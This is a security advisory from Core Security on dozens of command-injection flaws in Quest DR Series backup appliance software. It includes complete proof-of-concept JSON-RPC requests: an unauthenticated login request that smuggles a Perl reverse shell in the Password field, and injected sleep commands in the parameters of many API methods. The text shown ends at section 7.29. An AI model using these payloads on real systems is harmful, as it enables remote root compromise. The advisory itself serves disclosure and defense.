Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Quest DR Series Disk Backup Multiple Vulnerabilities 1. *Advisory Information* Title: Quest DR Series Disk Backup Multiple Vulnerabilities Advisory ID: CORE-2018-0002 Advisory URL: http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release 2. *Vulnerability Information* Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11143, CVE-2018-11144, CVE-2018-11145, CVE-2018-11146, CVE-2018-11147, CVE-2018-11148, CVE-2018-11149, CVE-2018-11150, CVE-2018-11151, CVE-2018-11152, CVE-2018-11153, CVE-2018-11154, CVE-2018-11155, CVE-2018-11156, CVE-2018-11157, CVE-2018-11158, CVE-2018-11159, CVE-2018-11160, CVE-2018-11161, CVE-2018-11162, CVE-2018-11163, CVE-2018-11164, CVE-2018-11165, CVE-2018-11166, CVE-2018-11167, CVE-2018-11168, CVE-2018-11169, CVE-2018-11170, CVE-2018-11171, CVE-2018-11172, CVE-2018-11173, CVE-2018-11174, CVE-2018-11175, CVE-2018-11176, CVE-2018-11177, CVE-2018-11178, CVE-2018-11179, CVE-2018-11180, CVE-2018-11181, CVE-2018-11182, CVE-2018-11183, CVE-2018-11184, CVE-2018-11185, CVE-2018-11186, CVE-2018-11187, CVE-2018-11188, CVE-2018-11189, CVE-2018-11190, CVE-2018-11191, CVE-2018-11192, CVE-2018-11193, CVE-2018-11194 3. *Vulnerability Description* Quest's website states that: "The Quest DR Series of disk backup appliances [1] are engineered to handle hundreds of incoming backup streams with an all-inclusive software solution that simplifies management of backups, giving you more time to focus on other tasks. The appliances work in conjunction with backup software applications to ensure data written to disks is protected for reliable recovery. New features such as storage groups, secure erase and user management give you the flexibility to tailor utilization policies to fit your organization's specific requirements. With Quest DR Series appliances, you can: - Back up more of your servers and applications - with support for more than 15 backup applications and enhanced security features such as encryption at rest and secure erase. - Store less backup data - using variable block, in-line deduplication and compression to lower backup storage requirements by an average of 20:1 at an average cost of $.05 - $.17/GB. - Perform better during data ingest and management - with built-in accelerators, logical storage groups and support for Fibre Channel connectivity and virtual tape libraries (VTLs)." Multiple vulnerabilities were found in the Quest DR Series Disk Backup software that would allow remote attackers to execute arbitrary system commands on the appliance with root permissions. Note: This advisory has limited details on the vulnerabilities because during an attempted coordinated disclosure process for other advisory, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability. CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk. We regret Quest's posture on disclosure and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices. 4. *Vulnerable Packages* . Quest DR Series Disk Backup Software 4.0.3 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Quest has released the build 4.0.3.1 that address the reported vulnerabilities. Build can be download at: . For DR4300e, DR4300, and DR6300: https://support.quest.com/download-install-detail/6085865 . For DR4000, DR4100, DR6000: https://support.quest.com/download-install-detail/6085802 For more details, Quest published the following Release Note: https://support.quest.com/technical-documents/dr-series-software/4.0.3.1/release-notes/ 6. *Credits* These vulnerabilities were discovered and researched by Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Multiple command injection vulnerabilities were found in the DR appliance software, which provides a web interface to manage system configuration. Clients make use of the site features via its exposed JSON-RPC API. The product does only provide SSH access to administrators inside a restricted rbash environment. Administrators are able to execute a small number of utilities that are mostly replicated in the web console. We present the most critical issue in section 7.1, which would allow a remote unauthenticated attacker to execute arbitrary system commands. Sections 7.2 to 7.46 describe other command injection vectors that require the attacker to have a valid authentication token. Finally, six privilege escalation vulnerabilities are described from section 7.47 to 7.52 that would allow an attacker executing commands as the web server user to gain root privileges. Exploiting any of the command injection vulnerabilities would grant the attacker the initial foothold from where to escalate to root. 7.1. *Unauthenticated command injection on login* [CVE-2018-11143] The 'Logon' method is in charge of processing login requests. It is possible for an unauthenticated attacker to execute arbitrary commands via the 'Password' parameter. The following proof of concept opens a reverse shell connection to 192.168.1.36 on port 12345 musing Perl. The username must point to an existing account on the system, so we set it to the hardcoded administrator account that ships with the product. /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/plain Content-Length: 336 Connection: close { "jsonrpc": "2.0", "method": "Logon", "params": { "UserName": "administrator", "Password": "';perl -e 'use Socket;$i=\"192.168.1.36\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};';echo '" }, "id": 1 } -----/ If Active Directory support is configured, then the attacker would also be able to inject arbitrary commands into the username field. 7.2. *Command injection in the user update method* [CVE-2018-11144] An authenticated attacker can craft the values of various user update properties to execute arbitrary commands on the system. The following proof of concept injects a 'sleep' command in the 'oldName' parameter. /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 158 Connection: close { "jsonrpc": "2.0", "method": "update", "params": { "classname": "DRUsers", "user": { "oldName": ";sleep 10; echo", "Name": "pepito", "oldRoles": ["PepitoRole"] } }, "id": 1 } -----/ 7.3. *Command injection in the user delete method* [CVE-2018-11145] An attacker would be able to inject system commands in the 'user' parameter passed to the 'delete' method. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 102 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DRUsers", "user": ";sleep 10; echo " }, "id": 1 } -----/ 7.4. *Command injection in the set user password method* [CVE-2018-11146] Both the 'update_pw' and 'setAdminPassword' methods can be abused to execute arbitrary system commands. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 138 Connection: close { "jsonrpc": "2.0", "method": "update_pw", "params": { "classname": "DRUsers", "user": { "Roles": ["PepeRole"], "Name": ";sleep 10; echo " } }, "id": 1 } -----/ 7.5. *Command injection in the add_new_container method* [CVE-2018-11147] Data backed up to DR Series appliances are handled as virtual shares or containers. The proof of concept injects a 'sleep' command in the 'c_name' parameter passed to the vulnerable 'add_new_container' method. /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 142 Connection: close { "jsonrpc": "2.0", "method": "add_new_container", "params": { "classname": "DRContainers", "connection_type": 5, "c_name": "; sleep 10; echo " }, "id": 1 } -----/ 7.6. *Command injection in the update_container method* [CVE-2018-11148] The method in charge of updating containers is also vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 141 Connection: close { "jsonrpc": "2.0", "method": "update_container", "params": { "classname": "DRContainers", "connection_type": 5, "c_name": "; sleep 10; echo " }, "id": 1 } -----/ 7.7. *Command injection in the setCleaner method* [CVE-2018-11149] The DR series administrator guide recommends performing scheduled disk space reclamation operations as a method for recovering disk space from the system. The subroutine in charge of setting this schedule was found to be vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 124 Connection: close { "jsonrpc": "2.0", "method": "setCleaner", "params": { "classname": "DRSchedules", "schedules": [{ "day": "; sleep 10; #" }] }, "id": 1 } -----/ 7.8. *Command injection in the setReplication method* [CVE-2018-11150] The DR Series system uses an active form of replication that lets you configure a primary-backup scheme. The subroutine in charge of configuring the replication schedule was found to be vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 117 Connection: close { "jsonrpc": "2.0", "method": "setReplication", "params": { "classname": "DRSchedules", "container": "; sleep 10; #" }, "id": 1 } -----/ 7.9. *Command injection in the setResetOptions method* [CVE-2018-11151] The DR series system GUI allows an administrator to configure password reset options, which is basically enabling or disabling the 'Forgot your password' link on the logon page. The subroutine that implements this functionality was found to be vulnerable to command injection via the 'admin_email' and 'relay_host' request parameters. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 119 Connection: close { "jsonrpc": "2.0", "method": "setResetOptions", "params": { "classname": "DRPassword", "admin_email": "; sleep 10; #" }, "id": 1 } -----/ 7.10. *Command injection in the set_compression method* [CVE-2018-11152] The appliance allows configuring several compression levels for each storage group. The subroutine that sets the level of compression was found to be vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 127 Connection: close { "jsonrpc": "2.0", "method": "set_compression", "params": { "classname": "DRCompression", "compressionLevel": "; sleep 10; #" }, "id": 1 } -----/ 7.11. *Command injection in the license delete method* [CVE-2018-11153] The JSON-RPC API exposes several methods to operate with system licenses, several of which are vulnerable to command injection issues. The 'delete' subroutine can be exploited by crafting the value of the 'serviceTag' request parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 108 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DRLicense", "serviceTag": "; sleep 10; #" }, "id": 1 } -----/ 7.12. *Command injection in the registerDR2000v method* [CVE-2018-11154] The 'registerDR2000v' method is part of the licensing system. This subroutine is vulnerable to command injection via the 'LicenseServer', 'AdminName', 'Email', 'CompanyName' and 'Comments' request parameters. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 133 Connection: close { "jsonrpc": "2.0", "method": "registerDR2000v", "params": { "classname": "DRLicense", "dr2000v": { "LicenseServer": "; sleep 10; #" } }, "id": 1 } -----/ 7.13. *Command injection in the updateRegisterDR2000v method* [CVE-2018-11155] The 'updateRegisterDR2000v' subroutine is yet another vulnerable method offered by the license management API. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 139 Connection: close { "jsonrpc": "2.0", "method": "updateRegisterDR2000v", "params": { "classname": "DRLicense", "dr2000v": { "LicenseServer": "; sleep 10; #" } }, "id": 1 } -----/ 7.14. *Command injection in the email relay host update method* [CVE-2018-11156] The appliance can be configured to use an external mail server for sending email alerts. The subroutine implementing this functionality was found to be vulnerable to command injection via the 'hostname' request parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 114 Connection: close { "jsonrpc": "2.0", "method": "update", "params": { "classname": "DREmailRelayHost", "hostname": "'; sleep 10; #" }, "id": 1 } -----/ 7.15. *Command injection in the join domain method* [CVE-2018-11157] A DR series system can be joined to a Microsoft Active Directory Services domain. This functionality is exposed by the 'ActiveDirectoryService' module. An attacker can inject system commands in the 'domain' parameter passed to the 'join' method. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 152 Connection: close { "jsonrpc": "2.0", "method": "join", "params": { "classname": "DRActiveDirectory", "username": "pepe", "password": "pepito", "domain": "; sleep 10; #" }, "id": 1 } -----/ 7.16. *Command injection in the add storage method* [CVE-2018-11158] The storage service module offers support for managing storage devices. The 'add' method was found to be vulnerable. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 106 Connection: close { "jsonrpc": "2.0", "method": "add", "params": { "classname": "DRStorage", "service_tag": "; sleep 10; #" }, "id": 1 } -----/ 7.17. *Command injection in the get_storage_group_statistics method* [CVE-2018-11159] The application provides usage statistics for each storage group, such as capacity used, compression status, inode count, etc. In particular, the 'group' parameter passed to the 'get_storage_group_statistics' is not sanitized, allowing system commands to be injected. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 130 Connection: close { "jsonrpc": "2.0", "method": "get_storage_group_statistics", "params": { "classname": "DRStorageGroup", "group": "; sleep 10; #" }, "id": 1 } -----/ 7.18. *Command injection in the create storage group method* [CVE-2018-11160] The subroutine that allows adding a new storage group was found to be vulnerable to command injection. An attacker can inject system commands on various request parameters, such as 'Compression_mode' and 'passphrase'. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 130 Connection: close { "jsonrpc": "2.0", "method": "create", "params": { "classname": "DRStorageGroup", "group": { "Compression_mode": "; sleep 10; #" } }, "id": 1 } -----/ 7.19. *Command injection in the delete storage group method* [CVE-2018-11161] The 'delete' subroutine in the 'StorageGroupService' module passes user generated input to the 'storage_group' system binary without sanitization, which allows an attacker to inject system commands via the 'name' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 107 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DRStorageGroup", "name": "; sleep 10; #" }, "id": 1 } -----/ 7.20. *Command injection in the update storage group method* [CVE-2018-11162] Several request parameters are taken from the 'newGroup' dictionary when updating a storage group and used as components of a command string without any sanitization taking place. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 159 Connection: close { "jsonrpc": "2.0", "method": "update", "params": { "classname": "DRStorageGroup", "newGroup": { "Name": "; sleep 10; #", "Compression_mode": "pepecomprimido" } }, "id": 1 } -----/ 7.21. *Command injection in the set contact information method* [CVE-2018-11163] The GUI provides functionality to set the administrator contact information. The 'relay_host' parameter is used as provided in the construction of a command line string, therefore allowing attackers to inject system commands. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 143 Connection: close { "jsonrpc": "2.0", "method": "set", "params": { "classname": "DRContactInformation", "action": "email_alerts", "relay_host": "'; sleep 10; #" }, "id": 1 } -----/ 7.22. *Command injection in the generate diagnostics method* [CVE-2018-11164] The diagnostics page allows users to generate diagnostic logs that capture the state of the system. An attacker authenticated within the web application can inject arbitrary system commands by crafting the value of the 'type' request parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 108 Connection: close { "jsonrpc": "2.0", "method": "generate", "params": { "classname": "DRDiagnostics", "type": "; sleep 15; #" }, "id": 1 } -----/ 7.23. *Command injection in the delete diagnostics method* [CVE-2018-11165] The 'delete' diagnostics functionality was found to be vulnerable to command injection via the 'file_name' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 111 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DRDiagnostics", "file_name": "; sleep 15; #" }, "id": 1 } -----/ 7.24. *Command injection in the rescan_replica_VTL_container method* [CVE-2018-11166] The subroutine in charge of rescanning a VTL container replica was found to be vulnerable to command injection via the container name parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 133 Connection: close { "jsonrpc": "2.0", "method": "rescan_replica_VTL_container", "params": { "classname": "DRReplications", "cname": "; sleep 10; echo " }, "id": 1 } -----/ 7.25. *Command injection in the activate_replica_VTL_container method* [CVE-2018-11167] The subroutine in charge of activating a VTL container was found to be vulnerable to command injection via the container name parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 136 Connection: close { "jsonrpc": "2.0", "method": "activate_replica_VTL_container", "params": { "classname": "DRReplications", "cname": "; sleep 10; echo " }, "id": 1 } -----/ 7.26. *Command injection in the deactivate_replica_VTL_container method* [CVE-2018-11168] The subroutine in charge of deactivating a VTL container was also found to be vulnerable to command injection via the container name parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 Content-Length: 138 Connection: close { "jsonrpc": "2.0", "method": "deactivate_replica_VTL_container", "params": { "classname": "DRReplications", "cname": "; sleep 10; echo " }, "id": 1 } -----/ 7.27. *Command injection in the start replication method* [CVE-2018-11169] The 'start' replication subroutine implements the logic to perform a replication in an existing storage replication relationship. Arbitrary command execution can be achieved via the 'name' parameter. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 107 Connection: close { "jsonrpc": "2.0", "method": "start", "params": { "classname": "DRReplications", "name": "'; sleep 15; #" }, "id": 1 } -----/ 7.28. *Command injection in the stop replication method* [CVE-2018-11170] The 'stop' replication functionality was also found to be vulnerable to command injection. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 106 Connection: close { "jsonrpc": "2.0", "method": "stop", "params": { "classname": "DRReplications", "name": "'; sleep 15; #" }, "id": 1 } -----/ 7.29. *Command injection in the delete replication method* [CVE-2018-11171] Deleting a replicaton is yet another way in which authenticated attackers could abuse the 'ReplicationsService' module in order to execute system commands in the context of the web application. Proof of concept: /----- POST /ws/v1.0/jsonrpc HTTP/1.1 Host: 192.168.1.39 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.39/ Content-Type: application/json-rpc SessionCookie: e2de614014605fc5115fd72076aa827e Content-Length: 106 Connection: close { "jsonrpc": "2.0", "method": "delete", "params": { "classname": "DRReplications", "name": "'; sleep 15; #" }, "id": 1 } 